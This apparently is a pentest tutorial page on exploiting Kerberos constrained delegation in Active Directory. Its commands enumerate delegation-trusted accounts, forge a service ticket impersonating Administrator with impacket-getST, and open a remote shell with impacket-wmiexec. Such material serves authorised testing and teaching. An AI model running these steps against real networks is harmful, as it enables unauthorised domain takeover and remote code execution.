Constrained Delegation Attack

Last modified: 2024-02-18

Active Directory Kerberos Windows

If a compromised account has the Kerberos Constrained Delegation right, the account may impersonate another user to request Kerberos service ticket and use it for such as signin services.


Check if Kerberos Constrained Delegation Enabled for User


Get-NetUser -TrustedToAuth


1. Request Service Ticket for Another User

The target SPN needs to be allowed for delegation.

# -k: Use Kerberos Auth
impacket-getST -k -impersonate Administrator -spn cifs/dc.example.local example.local/UserName

2. Use the Service Ticket

After getting the service ticket, we can use it for further pentesting.
We need to add the environment variable as below:

export KRB5CCNAME=`pwd`/Administrator.ccache

# Check by listing tickets.
# If the klist command not found, install it by `apt install krb5-user`
  • Login to Services with Kerberos Auth

    # -k: Use Kerberos Auth
    # -no-pass: No password
    impacket-wmiexec example.local/Administrator@example.local -k -no-pass